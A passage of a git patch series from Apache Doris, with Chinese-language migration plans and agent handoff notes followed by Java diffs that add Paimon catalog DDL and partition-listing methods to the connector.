3.4.2/hive 2.3.9) 的 `Configuration`/`HiveConf` 身份隐患。**编译 ABI 已证良性**(paimon-3.1 引用的 HiveConf 子集在 2.3.9 全存在),但 live 须验真实 HMS 建 catalog 不抛 `NoClassDefFoundError`/`LinkageError`/`ClassCastException`。 +2. **jdbc driver_url FE 安全 allow-list 未接**(white-list/secure-path/jar 名校验,须经 ConnectorContext hook;paimon 未入 SPI_READY_TYPES 故未触达)。 +3. **HMS 外部 hive-site.xml 文件加载延后**(kerberos sasl.enabled/service-principal/auth_to_local 已移植;UGI doAs 经 executeAuthenticated FE 注入)。 -- **B1**:T03 `PaimonConnector.createCatalog` flavor switch on `paimon.catalog.type`(warehouse/options/重建 Hadoop·HiveConf/**每-flavor `ExecutionAuthenticator`**;filesystem→hms→rest/jdbc/dlf 渐进)+ T04 拷 HMS/REST/DLF/JDBC + credential/storage 属性键入 `PaimonConnectorProperties` + T05 扩 `validateProperties`(flavor 合法性 fail-fast)。**每-flavor authenticator 丢=Kerberos DDL 炸**(无离线测覆盖)。 -- **B6**(procedure doc no-op,独立)可随时穿插落。 -- 批次依赖图 / 翻闸前置硬门见 [tasks/P5-paimon-migration.md](./tasks/P5-paimon-migration.md) §批次依赖。 +## 🎯 下一 session = B2(normal-read;gated on B1 已完成) + +- **T06(BLOCKER)**:修 `PaimonScanPlanProvider:95` transient-Table reload fallback(transient null 时 `catalog.getTable(Identifier)` 重建;序列化后 NPE)。可参照 metadata 侧 `getColumnHandles` 已有 fallback。 +- **T07**:`PaimonPredicateConverter` session-TZ 化(读 `getTimeZone()` 惰性解析+降级,替 `:284` 固定 UTC);[[catalog-spi-connector-session-tz-gotcha]]。 +- **T08**:`listPartitionNames/listPartitions/listPartitionValues`(填 `ConnectorPartitionInfo` 含 `lastModifiedMillis=Partition.lastFileCreationTime()`)+ `getProperties`(现 stub `:154`)。 +- **T09**:override 6-arg `planScan(...requiredPartitions)` 让引擎分区裁剪生效(`PluginDrivenScanNode:474`,现只 override 4-arg),OR 文档化纯谓词裁剪 + 测。 +- **T10**:连接器内 cache 已解析 Table+schema(替 `PaimonExternalMetaCache`);核 REFRESH CATALOG/TABLE seam。 +- 批次依赖图 / 翻闸前置硬门见 [tasks/P5-paimon-migration.md](./tasks/P5-paimon-migration.md) §批次依赖。**B6**(procedure doc no-op,独立)可随时穿插。 ## ⚙️ 操作须知(复用) -- maven 绝对 `-f /mnt/disk1/yy/git/wt-catalog-spi/fe/pom.xml -pl : -am -Dmaven.build.cache.enabled=false`(**须 -am**,裸 -pl 会因 `${revision}` 兄弟解析虚假失败);改连接器 `:fe-connector-paimon`、改 SPI `:fe-connector-api`(-am 连带)、改 fe-core `:fe-core`。读真实 `Tests run:`/`BUILD`,勿信后台 echo exit([[doris-build-verify-gotchas]])。 -- 连接器禁 import fe-core(import-gate `bash tools/check-connector-imports.sh`);session 值经 session-property 透传([[catalog-spi-connector-session-tz-gotcha]])。连接器测试无 mockito(纯 seam / child-first loader,[[catalog-spi-fe-core-test-infra]]);checkstyle 含 test 源、绑 validate 阶段(`mvn test` 即跑;或单 `checkstyle:check`)。 +- maven 绝对 `-f /mnt/disk1/yy/git/wt-catalog-spi/fe/pom.xml -pl : -am -Dmaven.build.cache.enabled=false`(**须 -am**,裸 -pl 会因 `${revision}` 兄弟解析虚假失败);改连接器 `:fe-connector-paimon`、改 SPI `:fe-connector-api`、改 fe-core `:fe-core`。读真实 `Tests run:`/`BUILD`,勿信后台 echo exit([[doris-build-verify-gotchas]])。 +- 连接器禁 import fe-core/fe-common(`org.apache.doris.{catalog,common,datasource,qe,analysis,nereids,planner}`;import-gate `bash tools/check-connector-imports.sh`)。连接器测试无 mockito(纯 seam / child-first loader,[[catalog-spi-fe-core-test-infra]]);checkstyle 含 test 源、绑 validate(`mvn test` 即跑)。 - 翻闸(B7)GSON **7 注册原子齐迁**(5 catalog + db + table,[[catalog-spi-gson-migrate-all-three]] / [[catalog-spi-cutover-fe-dispatch-gap]]);删 legacy(B8)后验 paimon-core FE classpath 恰一份([[catalog-spi-be-java-ext-shared-classpath]])。 -- 分支 `catalog-spi-07-paimon`。**未跟踪/本地 scratch 勿提交**:`regression-test/conf/regression-conf.groovy`(+`.bak`)、`.audit-scratch/`、`conf.cmy/`、`.claude/scheduled_tasks.lock`(用户本地集群配置)。 +- 分支 `catalog-spi-07-paimon`。**B1 改动未提交**(用户决定何时 commit);连接器新文件 `PaimonCatalogFactory.java`/`PaimonCatalogFactoryTest.java` 未跟踪。**未跟踪/本地 scratch 勿提交**:`regression-test/conf/regression-conf.groovy`(+`.bak`)、`.audit-scratch/`、`conf.cmy/`、`.claude/scheduled_tasks.lock`(用户本地集群配置)。 ## 🧠 给下一个 agent 的 meta -- **D-037/D-038 已签字**,B0 已落 —— 直接按设计 doc B1→B9 续,无须重开 scope。 -- **live e2e(真实 paimon 各 flavor 环境)仍是翻闸真正完成门**(CI 跳),翻闸前须用户验;parity doc §4 有 run plan。 +- **D-037/D-038 已签字 + all-5-flavors 已签**,B0+B1 已落 —— 按设计 doc B2→B9 续。 +- **live e2e(真实 paimon 各 flavor 环境)= 翻闸真正完成门**(CI 跳),翻闸前用户验;B1 新增 3 个 live-e2e 硬门(见上 ⚠️);parity doc §4 有 run plan。 - **MTMV 单-pin 不变式**(B5)是最高 correctness 风险;`lastFileCreationTime()` 跨 flavor 可靠性须 live 验。 -- auto-memory:[[catalog-spi-p5-paimon-design]](设计决策 + 3 证伪先验索引)。 +- auto-memory:[[catalog-spi-p5-paimon-design]](设计决策)、[[catalog-spi-p5-b1-design]](B1 flavor 装配定夺 + 2 blocker + 翻闸门)。 diff --git a/plan-doc/tasks/P5-paimon-migration.md b/plan-doc/tasks/P5-paimon-migration.md index 6467ab370dab72..4fcd5e6a54364c 100644 --- a/plan-doc/tasks/P5-paimon-migration.md +++ b/plan-doc/tasks/P5-paimon-migration.md @@ -7,7 +7,7 @@ ## 元信息 -- **状态**:🟢 进行中(**B0 已完成 2026-06-09**:T01 测试基建 + T02 parity baseline,连接器 12/0/0/1 绿、checkstyle 0、import-gate 净;下一批 = B1 flavor 装配) +- **状态**:🟢 进行中(**B1 已完成 2026-06-09**:T03/T04/T05 flavor 装配,用户签 all-5-flavors,连接器 43/0/0/1 绿、checkstyle 0、import-gate 0、final holistic review=READY;下一批 = B2 normal-read。B0 见阶段日志) - **启动日期**:2026-06-09(recon+设计) - **目标完成**:TBD(估时 ~5-6 周,含 D2-A 的 MTMV/MVCC 桥) - **阻塞**:无(D1=A / D2=A 已签字);分批实现按 B0→B9 启动 @@ -85,9 +85,9 @@ Master plan [§3.6](../00-connector-migration-master-plan.md);策略 = full ad |---|---|---|---|---|---| | P5-T01 | 建 `fe-connector-paimon` 测试模块 + 注入式 SDK seam(`PaimonCatalogOps` 接口包远端 Catalog 调用,MC `McStructureHelper` 范式,no-mockito recording fake)| B0 | C+T | ✅ | seam=5 读方法(B0 只读,DDL 待 B1-B3 扩);`PaimonConnectorMetadata` 6 调用点齐迁;9 UT 钉 databaseExists try/catch + getColumnHandles reload-fallback + 1 env-gated live smoke | | P5-T02 | parity baseline(vs 旧 `PaimonScanNode`:谓词/分区/native·JNI/deletion/SELECT*,doc [`research/p5-paimon-parity-baseline.md`](../research/p5-paimon-parity-baseline.md))+ FE→BE round-trip smoke(offline `PaimonTableSerdeRoundTripTest`,CI 非 env-gated)+ **pin paimon-core 版本三方对齐**(R-007 注释落 `fe/pom.xml` ``) | B0 | T | ✅ | 翻闸前后跑;gap 见 doc §3 | -| P5-T03 | `PaimonConnector.createCatalog` flavor 装配(switch on `paimon.catalog.type`:warehouse/options/重建 Hadoop·HiveConf/**每-flavor ExecutionAuthenticator**;filesystem→hms→rest/jdbc/dlf 渐进)| B1 | C | ⏳ | **gated on D1**;authenticator 丢=Kerberos DDL 炸 | -| P5-T04 | 拷 HMS/REST/DLF/JDBC + credential/storage 属性键入 `PaimonConnectorProperties`(禁 import fe-core)| B1 | C | ⏳ | | -| P5-T05 | 扩 `PaimonConnectorProvider.validateProperties`(flavor 合法性 + 每-flavor 必需属性,`IllegalArgumentException` fail-fast)| B1 | C | ⏳ | legacy `PaimonExternalCatalogFactory:29-47` | +| P5-T03 | `PaimonConnector.createCatalog` flavor 装配(switch on `paimon.catalog.type`→paimon `metastore` opt:warehouse/options/重建 Hadoop·HiveConf/**authenticator=`ConnectorContext.executeAuthenticated`**;全 5 flavor)| B1 | C | ✅ | 新 `PaimonCatalogFactory`(纯 buildCatalogOptions/buildHadoopConfiguration/buildHmsHiveConf/buildDlfHiveConf/requireOssStorageForDlf);线程 ConnectorContext;DriverShim 经 getEnvironment 替 JdbcResource;hms/dlf live-e2e 门见下 | +| P5-T04 | 拷 HMS/REST/DLF/JDBC + credential/storage 属性键入 `PaimonConnectorProperties`(禁 import fe-core)| B1 | C | ✅ | 全 flavor key 常量,多别名 `String[]` | +| P5-T05 | 扩 `PaimonConnectorProvider.validateProperties`(flavor 合法性 + 每-flavor 必需属性,`IllegalArgumentException` fail-fast)| B1 | C | ✅ | → `PaimonCatalogFactory.validate`;rest 同样必需 warehouse(legacy parity,纠偏 recon)| | P5-T06 | 修 `PaimonTableHandle` transient-Table **reload fallback**(transient null 时由 `catalog.getTable(Identifier)` 重建);`PaimonScanPlanProvider:95` 调用 | B2 | C | ⏳ | **BLOCKER** | | P5-T07 | `PaimonPredicateConverter` session-TZ 化(读 `getTimeZone()` 惰性解析+降级,替 `:284` 固定 UTC);不可转降级空;`supportsCastPredicatePushdown()=false`;保 FLOAT/CHAR 不下推 | B2 | C | ⏳ | [[catalog-spi-connector-session-tz-gotcha]] | | P5-T08 | 实现 `PaimonConnectorMetadata.listPartitionNames/listPartitions/listPartitionValues`(填 `ConnectorPartitionInfo` 含 lastModifiedMillis=`Partition.lastFileCreationTime()`,partitionName=最终 legacy-name 解析后显示名)+ `getProperties`(现 stub `:154`)| B2 | C | ⏳ | 喂 `getNameToPartitionItems:246` 裁剪 + MTMV | @@ -177,12 +177,26 @@ B6 (procedure doc no-op, 独立) │ - **开放|REFRESH TABLE seam**:`PluginDrivenExternalCatalog` 仅 REFRESH CATALOG 销 connector;REFRESH TABLE 是否触连接器 cache 未核 → 可能需 `invalidateTable` SPI。 - **开放|BE sys-table `TTableDescriptor`**:旧发 HIVE_TABLE,PluginDriven 默认 SCHEMA_TABLE;须核 BE paimon-scanner 期望。 - **开放|`isPartitionInvalid` parity**:基类 `TablePartitionValues` 是否静默丢失败转换计数。 -- **开放|JDBC flavor DriverShim/URLClassLoader** 在 parent-first 连接器 loader 下的归属。 +- **开放|JDBC flavor DriverShim/URLClassLoader** 在 parent-first 连接器 loader 下的归属。(B1:DriverShim 已移植,driver_url 经 `ConnectorContext.getEnvironment()` 解析;下条记安全门) +- **R-高|翻闸门(B1 落地,live-e2e 必验)|hms/dlf metastore-client 跨 classloader**:连接器只编译 `HiveConf`(hive-common)+ `Configuration`(hadoop-common),**不打包** Thrift `IMetaStoreClient`/`HiveMetaStoreClient`(paimon-hive-connector 的 hive-exec/metastore=test scope;DLF `ProxyMetaStoreClient`)。翻闸时须由 FE host `hive-catalog-shade`(3.1.x) 提供;plugin child-first 下 host 的 `Configuration`/`HiveConf`(3.1.x) 与 plugin bundled(hadoop 3.4.2/hive 2.3.9) 可能身份冲突。翻闸前 live 验:真实 HMS `metastore=hive` 经 plugin 建 catalog 不抛 `NoClassDefFoundError: .../IMetaStoreClient` / `LinkageError` / `ClassCastException`(编译态 ABI 子集已证良性:paimon-3.1 引用的 HiveConf ConfVars/方法在 2.3.9 全存在)。修向(翻闸时定夺):bundle 自洽 hive 栈并强制 `org.apache.hadoop.hive.` parent-first 用 host shade,或加 metastore-client dep 让整栈单 loader 解析。 +- **R-中|翻闸门|jdbc driver_url FE 安全 allow-list 未接**:legacy `JdbcResource.getFullDriverUrl` 的 `jdbc_driver_url_white_list`/`jdbc_driver_secure_path`/jar 名校验连接器未复现(禁 import fe-core)。翻闸前须经 `ConnectorContext` hook(参 `sanitizeJdbcUrl`)路由;paimon 未入 `SPI_READY_TYPES` 故当前不可触达。 +- **R-中|翻闸门|HMS 外部 hive-site.xml 文件加载延后**:`buildHmsHiveConf` 只吃 `hive.*`/auth 键 + storage,未加载 `hive.conf.resources` 指向的 hive-site.xml(legacy 用 fe-core `CatalogConfigFileUtils`,禁 import)。kerberos sasl.enabled/service-principal/auth_to_local 已移植;UGI doAs 经 `executeAuthenticated` FE 注入。 --- ## 阶段日志(倒序) +### 2026-06-09(B1 实现:flavor 装配,全 5 flavor,单 Catalog) +- **用户签字 all-5-flavors**(非分阶段);内部 2-dispatch 落地(dispatch1=offline core+paimon-core 3 flavor 活线;dispatch2=hms/dlf 活线+pom deps),每 dispatch implement→spec-review→quality-review→fix-loop→re-review,主线 firsthand 复跑构建。 +- **T04**:`PaimonConnectorProperties` 加全 flavor key 常量(HMS/REST/JDBC/DLF,多别名 `String[]`)。 +- **T05**:`PaimonConnectorProvider.validateProperties` override → `PaimonCatalogFactory.validate`(flavor 合法性 + 每-flavor 必需键 fail-fast:全 flavor warehouse / hms uri / jdbc uri+driver_class-if-driver_url / rest dlf-token requireIf / dlf ak·sk + endpoint-or-region)。 +- **T03**:新 `PaimonCatalogFactory`(纯 `buildCatalogOptions` flavor→`metastore` 映射[filesystem/hive/rest/jdbc] + 每-flavor opts + `paimon.*` 透传排除 storage 前缀;纯 `buildHadoopConfiguration`/`buildHmsHiveConf`/`buildDlfHiveConf`;`requireOssStorageForDlf`);`PaimonConnector` 线程 `ConnectorContext`,`createCatalog` 全 5 flavor 活线(filesystem/jdbc=Options+Configuration,rest=Options-only,hms/dlf=HiveConf;全 `context.executeAuthenticated` 包裹;JDBC DriverShim 经 `getEnvironment` 替 `JdbcResource`)。 +- **pom**:加 `paimon-hive-connector-3.1` + `hadoop-common` + `hive-common`(compile,managed 版);**弃 hive-catalog-shade** 避 fastutil 冲突([[catalog-spi-fastutil-hive-shade-classpath]])。 +- **2 新 blocker 已解(非 plan 预见)**:① JDBC `JdbcResource` 禁 import → `ConnectorContext.getEnvironment()`(`jdbc_drivers_dir`/`doris_home`);② storage `Configuration` 由 fe-core `StorageProperties` 构建(禁)→ minimal 重建(`fs.*`/`dfs.*`/`hadoop.*` + `paimon.s3.*`→`fs.s3a.` normalize)。 +- **验证(主线 firsthand)**:`Tests run: 43, Failures: 0, Errors: 0, Skipped: 1`(PaimonCatalogFactoryTest 31 + ConnectorMetadataTest 9 + serde 2 + 1 live skip)+ BUILD SUCCESS + checkstyle 0 + import-gate 0。final holistic review = READY。 +- **纠偏**:recon「rest Options-only 无 warehouse 必需」证伪——legacy `AbstractPaimonProperties` warehouse `@ConnectorProperty` required 默认 true 且 rest 未 override → rest 同样必需 warehouse(已改齐 legacy parity)。 +- **翻闸(B7)硬门新增(详见「风险/开放问题」+ parity doc;live-e2e 必验,pre-cutover 离线不可测)**:① hms/dlf Thrift metastore client(`IMetaStoreClient`/`HiveMetaStoreClient`,DLF `ProxyMetaStoreClient`)连接器**不打包**,翻闸时由 FE host `hive-catalog-shade` 提供 + plugin child-first 下 `Configuration`/`HiveConf` 跨 loader 身份隐患须验(无 NoClassDefFound/LinkageError/ClassCastException);② jdbc `driver_url` 的 FE 安全 allow-list(white-list/secure-path/jar 名校验)未接(须经 `ConnectorContext` hook,paimon 未入 SPI_READY_TYPES 故未触达);③ HMS 外部 hive-site.xml 文件加载延后(legacy 用 fe-core `CatalogConfigFileUtils`,连接器禁 import);④ 每-flavor live `createCatalog` + jdbc driver 注册离线不可测。 + ### 2026-06-09(B0 实现:测试基建 + parity baseline) - **T01**:抽 `PaimonCatalogOps` 注入式 seam(5 读方法,B0 只读)over 远端 Catalog;`PaimonConnectorMetadata` 6 调用点齐迁(读路径字节级不变,`Catalog` import 仅留两 NotExist catch);`PaimonConnector` 装配;建测试模块 = no-mockito `RecordingPaimonCatalogOps` + `PaimonConnectorMetadataTest`(9 UT,钉 `databaseExists` try/catch 与 `getColumnHandles` reload-fallback,各带 WHY+MUTATION)+ `FakePaimonTable`(28 非读方法 fail-loud)+ env-gated `PaimonLiveConnectivityTest`。 - **T02**:① R-007 三方版本已对齐(`${paimon.version}=1.3.1` 单源 `fe/pom.xml:399`,FE 连接器 + BE paimon-scanner + preload-extensions 同源)→ 落不变式注释(非改版本)。② offline FE→BE serde round-trip smoke `PaimonTableSerdeRoundTripTest`:真 `FileSystemCatalog`/`LocalFileIO`@TempDir → 真 `FileStoreTable` → 连接器 encode(InstantiationUtil+STD Base64)→ BE-side decode(镜像 `PaimonUtils.deserialize` URL-first/STD-fallback)→ 断 rowType/partition/primary keys;CI 跑非 env-gated。③ parity-baseline doc [`research/p5-paimon-parity-baseline.md`](../research/p5-paimon-parity-baseline.md):33 p0 + 6 p2 + 3 MTMV + fe-core `PaimonScanNodeTest` 清单、翻闸自动 before/after 门模型、4 真 gap + live-e2e 计划。 @@ -212,6 +226,6 @@ B6 (procedure doc no-op, 独立) │ ## 当前阻塞项 -- 无硬阻塞(D1=A / D2=A 已签字;**B0 已完成 2026-06-09**)。下一 session 起 **B1**(flavor 装配,单 Catalog 模型,T03/T04/T05;gated on D1,已签);**B6**(procedure doc no-op,独立)可随时落。 -- 翻闸(B7)仍 gated on B2+B3+B4+B5 全完 + live e2e(用户真实 paimon 各 flavor 环境)。 -- B0 复用资产:seam(B1-B3 须扩 DDL 方法 + 同步 `RecordingPaimonCatalogOps`/`CatalogBackedPaimonCatalogOps`);parity doc 是后续批次 gap 清单 + 翻闸门基准。 +- 无硬阻塞(D1=A / D2=A 已签字;**B0 + B1 已完成 2026-06-09**)。下一 session 起 **B2**(normal-read:T06 transient-Table reload BLOCKER / T07 session-TZ 谓词 / T08 listPartitions+lastModifiedMillis / T09 6-arg planScan 分区裁剪 / T10 连接器内 cache);**B6**(procedure doc no-op,独立)可随时落。 +- 翻闸(B7)仍 gated on B2+B3+B4+B5 全完 + live e2e(用户真实 paimon 各 flavor 环境)。**B1 新增 4 个翻闸/live-e2e 硬门**(见阶段日志 B1 条 + 「风险/开放问题」):hms/dlf metastore-client 跨 loader、jdbc driver_url 安全 allow-list、hive-site.xml 文件加载、live createCatalog——pre-cutover 不可离线测,翻闸前用户须 live 验。 +- B1 复用资产:`PaimonCatalogFactory`(纯 options/conf 构建器,B3 DDL 可复用 flavor 解析 + conf 构建);seam(B2-B3 须扩 DDL 方法 + 同步 `RecordingPaimonCatalogOps`/`CatalogBackedPaimonCatalogOps`);parity doc 是后续批次 gap 清单 + 翻闸门基准。 From deb30e99438bc02bfc0e669a6ec12c2ce983e908 Mon Sep 17 00:00:00 2001 From: morningman Date: Wed, 10 Jun 2026 06:54:00 +0800 Subject: [PATCH 011/128] [feat](connector) P5 paimon B2+B3: normal-read + DDL metadata (T06-T15) Connector-side only; no fe-core / fe-connector-api / fe-connector-spi changes. B2 and B3 were both uncommitted and are entangled in the same files (PaimonConnectorMetadata, PaimonCatalogOps, PaimonConnector, RecordingPaimonCatalogOps), so they are committed together. B2 normal-read (T06-T10): - T06 PaimonScanPlanProvider transient-Table reload fallback (planScan + getScanNodeProperties both guarded) - T07 PaimonPredicateConverter parity-correct TZ (NTZ keeps UTC, LTZ not pushed) + supportsCastPredicatePushdown=false - T08 listPartitionNames/listPartitions/listPartitionValues (legacy display-name parity) + seam listPartitions(Identifier) - T09 doc-only pure-predicate pruning; T10 cache deferred to B8 B3 DDL metadata (T11-T15): - T11 PaimonTypeMapping.toPaimonType (Doris->paimon, byte-parity with legacy DorisToPaimonTypeVisitor; narrow gap preserved) - T12 PaimonSchemaBuilder (ConnectorCreateTableRequest -> paimon Schema) - T13 createTable/dropTable + seam DDL methods + ConnectorContext threaded (D7=B: each DDL op wrapped in executeAuthenticated; read path un-wrapped) - T14 supportsCreateDatabase/createDatabase (HMS-props gate) + dropDatabase(force) (enumerate-loop + native cascade) - T15 offline UTs (no-mockito; WHY+MUTATION) Verified: fe-connector-paimon Tests run: 96, Failures: 0, Errors: 0, Skipped: 1 (live); checkstyle 0; connector import-gate 0. Co-Authored-By: Claude Opus 4.8 (1M context) --- .../connector/paimon/PaimonCatalogOps.java | 54 ++- .../connector/paimon/PaimonConnector.java | 5 +- .../paimon/PaimonConnectorMetadata.java | 310 +++++++++++++++++- .../paimon/PaimonPredicateConverter.java | 12 +- .../paimon/PaimonScanPlanProvider.java | 49 ++- .../connector/paimon/PaimonSchemaBuilder.java | 140 ++++++++ .../connector/paimon/PaimonTypeMapping.java | 99 ++++++ .../connector/paimon/FakePaimonTable.java | 18 +- .../PaimonConnectorMetadataDbDdlTest.java | 271 +++++++++++++++ .../PaimonConnectorMetadataDdlTest.java | 267 +++++++++++++++ .../PaimonConnectorMetadataPartitionTest.java | 214 ++++++++++++ .../paimon/PaimonConnectorMetadataTest.java | 21 +- .../paimon/PaimonPredicateConverterTest.java | 145 ++++++++ .../paimon/PaimonScanPlanProviderTest.java | 101 ++++++ .../paimon/PaimonSchemaBuilderTest.java | 196 +++++++++++ .../paimon/PaimonTypeMappingToPaimonTest.java | 184 +++++++++++ .../paimon/RecordingConnectorContext.java | 58 ++++ .../paimon/RecordingPaimonCatalogOps.java | 91 ++++- plan-doc/HANDOFF.md | 62 ++-- plan-doc/tasks/P5-paimon-migration.md | 71 +++- 20 files changed, 2295 insertions(+), 73 deletions(-) create mode 100644 fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonSchemaBuilder.java create mode 100644 fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataDbDdlTest.java create mode 100644 fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataDdlTest.java create mode 100644 fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataPartitionTest.java create mode 100644 fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonPredicateConverterTest.java create mode 100644 fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java create mode 100644 fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonSchemaBuilderTest.java create mode 100644 fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonTypeMappingToPaimonTest.java create mode 100644 fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/RecordingConnectorContext.java diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogOps.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogOps.java index ec7dd086c48c28..0db505afde7658 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogOps.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogOps.java @@ -20,12 +20,15 @@ import org.apache.paimon.catalog.Catalog; import org.apache.paimon.catalog.Database; import org.apache.paimon.catalog.Identifier; +import org.apache.paimon.partition.Partition; +import org.apache.paimon.schema.Schema; import org.apache.paimon.table.Table; import java.util.List; +import java.util.Map; /** - * Injection seam over the remote Paimon {@link Catalog} read calls. + * Injection seam over the remote Paimon {@link Catalog} calls. * *

The default {@link CatalogBackedPaimonCatalogOps} simply delegates to a real * {@code Catalog}, which requires a live remote catalog (filesystem / HMS / DLF / REST / @@ -34,7 +37,11 @@ * recording fake (no Mockito) — mirroring the maxcompute connector's * {@link org.apache.doris.connector.maxcompute.McStructureHelper McStructureHelper} pattern. * - *

B0 scope is strictly read-only; later batches grow this seam with DDL methods. + *

The read methods landed in B0. B3 added the four DDL methods + * ({@link #createDatabase}, {@link #dropDatabase}, {@link #createTable}, {@link #dropTable}), + * whose signatures (and checked exceptions) mirror the real Paimon {@code Catalog} exactly. + * Existence is probed via the existing {@link #getTable} / {@link #getDatabase} read methods + * (plus the caught not-exist exceptions); the seam intentionally has no separate probe methods. */ public interface PaimonCatalogOps { @@ -46,6 +53,20 @@ public interface PaimonCatalogOps { Table getTable(Identifier identifier) throws Catalog.TableNotExistException; + List listPartitions(Identifier identifier) throws Catalog.TableNotExistException; + + void createDatabase(String name, boolean ignoreIfExists, Map properties) + throws Catalog.DatabaseAlreadyExistException; + + void dropDatabase(String name, boolean ignoreIfNotExists, boolean cascade) + throws Catalog.DatabaseNotExistException, Catalog.DatabaseNotEmptyException; + + void createTable(Identifier identifier, Schema schema, boolean ignoreIfExists) + throws Catalog.TableAlreadyExistException, Catalog.DatabaseNotExistException; + + void dropTable(Identifier identifier, boolean ignoreIfNotExists) + throws Catalog.TableNotExistException; + void close() throws Exception; /** @@ -79,6 +100,35 @@ public Table getTable(Identifier identifier) throws Catalog.TableNotExistExcepti return catalog.getTable(identifier); } + @Override + public List listPartitions(Identifier identifier) throws Catalog.TableNotExistException { + return catalog.listPartitions(identifier); + } + + @Override + public void createDatabase(String name, boolean ignoreIfExists, Map properties) + throws Catalog.DatabaseAlreadyExistException { + catalog.createDatabase(name, ignoreIfExists, properties); + } + + @Override + public void dropDatabase(String name, boolean ignoreIfNotExists, boolean cascade) + throws Catalog.DatabaseNotExistException, Catalog.DatabaseNotEmptyException { + catalog.dropDatabase(name, ignoreIfNotExists, cascade); + } + + @Override + public void createTable(Identifier identifier, Schema schema, boolean ignoreIfExists) + throws Catalog.TableAlreadyExistException, Catalog.DatabaseNotExistException { + catalog.createTable(identifier, schema, ignoreIfExists); + } + + @Override + public void dropTable(Identifier identifier, boolean ignoreIfNotExists) + throws Catalog.TableNotExistException { + catalog.dropTable(identifier, ignoreIfNotExists); + } + @Override public void close() throws Exception { catalog.close(); diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnector.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnector.java index 4165469cb7bcbe..aee8b325c28e45 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnector.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnector.java @@ -83,12 +83,13 @@ public PaimonConnector(Map properties, ConnectorContext context) @Override public ConnectorMetadata getMetadata(ConnectorSession session) { return new PaimonConnectorMetadata( - new PaimonCatalogOps.CatalogBackedPaimonCatalogOps(ensureCatalog()), properties); + new PaimonCatalogOps.CatalogBackedPaimonCatalogOps(ensureCatalog()), properties, context); } @Override public ConnectorScanPlanProvider getScanPlanProvider() { - return new PaimonScanPlanProvider(properties); + return new PaimonScanPlanProvider(properties, + new PaimonCatalogOps.CatalogBackedPaimonCatalogOps(ensureCatalog())); } private Catalog ensureCatalog() { diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java index 5463f2c1e80d0e..7a0d38ee038607 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java @@ -19,27 +19,38 @@ import org.apache.doris.connector.api.ConnectorColumn; import org.apache.doris.connector.api.ConnectorMetadata; +import org.apache.doris.connector.api.ConnectorPartitionInfo; import org.apache.doris.connector.api.ConnectorSession; import org.apache.doris.connector.api.ConnectorTableSchema; import org.apache.doris.connector.api.ConnectorType; +import org.apache.doris.connector.api.DorisConnectorException; +import org.apache.doris.connector.api.ddl.ConnectorCreateTableRequest; import org.apache.doris.connector.api.handle.ConnectorColumnHandle; import org.apache.doris.connector.api.handle.ConnectorTableHandle; +import org.apache.doris.connector.api.pushdown.ConnectorExpression; +import org.apache.doris.connector.spi.ConnectorContext; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; import org.apache.paimon.catalog.Catalog; import org.apache.paimon.catalog.Identifier; +import org.apache.paimon.partition.Partition; +import org.apache.paimon.schema.Schema; import org.apache.paimon.table.Table; import org.apache.paimon.types.DataField; +import org.apache.paimon.types.DataTypeRoot; import org.apache.paimon.types.RowType; +import org.apache.paimon.utils.DateTimeUtils; import java.util.ArrayList; import java.util.Collections; import java.util.HashMap; +import java.util.HashSet; import java.util.LinkedHashMap; import java.util.List; import java.util.Map; import java.util.Optional; +import java.util.Set; /** * {@link ConnectorMetadata} implementation for Paimon. @@ -54,10 +65,19 @@ public class PaimonConnectorMetadata implements ConnectorMetadata { private final PaimonCatalogOps catalogOps; private final PaimonTypeMapping.Options typeMappingOptions; + private final ConnectorContext context; + // The connector's own injected catalog property map. Retained to resolve the catalog flavor + // for the HMS-only-props gate in createDatabase. This is the same data as + // session.getCatalogProperties() (the FE injects both from one source), but using the + // directly-injected map avoids depending on the session being populated and is simpler. + private final Map catalogProperties; - public PaimonConnectorMetadata(PaimonCatalogOps catalogOps, Map properties) { + public PaimonConnectorMetadata(PaimonCatalogOps catalogOps, Map properties, + ConnectorContext context) { this.catalogOps = catalogOps; this.typeMappingOptions = buildTypeMappingOptions(properties); + this.context = context; + this.catalogProperties = properties; } @Override @@ -154,10 +174,289 @@ public Map getProperties() { return Collections.emptyMap(); } + // ==================== DDL: Create/Drop Table ==================== + + /** + * Creates a Paimon table from the full {@link ConnectorCreateTableRequest}. + * + *

